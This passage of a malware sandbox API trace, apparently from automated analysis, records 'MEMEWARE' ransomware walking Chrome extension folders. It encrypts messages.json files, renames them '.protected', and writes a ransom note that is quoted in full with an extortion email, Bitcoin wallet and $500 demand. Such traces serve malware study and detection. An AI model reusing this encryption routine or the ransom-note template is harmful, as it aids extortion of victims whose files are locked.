halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.protected")) returned 1 [0079.830] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.830] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.830] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\RESTORE_FILES.txt") returned 161 [0079.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.831] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.831] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.831] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.831] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.832] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.832] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.832] CloseHandle (hObject=0x164) returned 1 [0079.832] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.832] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0079.832] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0079.832] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0079.832] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0079.832] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0079.832] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl") returned 143 [0079.832] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0079.832] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0079.832] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\*") returned 145 [0079.832] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.832] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.832] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.832] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.832] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.833] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.833] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\.") returned 145 [0079.833] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.833] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.833] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.833] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.833] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.833] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.833] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.833] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\..") returned 146 [0079.833] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.833] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.833] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.833] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.833] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.833] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.833] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.833] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.833] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json") returned 157 [0079.833] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.833] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.833] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.833] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.833] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.834] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json") returned 157 [0079.834] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.834] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json") returned 157 [0079.834] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.834] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json") returned 157 [0079.834] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.834] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.835] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.835] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.835] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.835] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.835] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.835] CloseHandle (hObject=0x168) returned 1 [0079.835] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.protected") returned 167 [0079.835] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.protected")) returned 1 [0079.836] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.836] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.836] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\RESTORE_FILES.txt") returned 161 [0079.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.836] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.836] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.837] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.837] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.838] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.838] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.838] CloseHandle (hObject=0x164) returned 1 [0079.838] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.838] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0079.838] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0079.838] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0079.838] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0079.838] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0079.838] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR") returned 146 [0079.838] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0079.838] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0079.838] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\*") returned 148 [0079.838] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.839] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.839] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.839] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.839] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.839] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.839] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\.") returned 148 [0079.839] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.839] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.839] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.839] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.839] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.839] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.839] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.839] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\..") returned 149 [0079.839] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.839] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.839] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.839] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.839] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.839] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.839] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.840] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.840] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json") returned 160 [0079.840] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.840] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.840] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.840] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json") returned 160 [0079.840] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json") returned 160 [0079.840] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json") returned 160 [0079.840] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.840] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.841] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.841] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.841] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.841] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.842] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.842] CloseHandle (hObject=0x168) returned 1 [0079.842] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json.protected") returned 170 [0079.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json"), 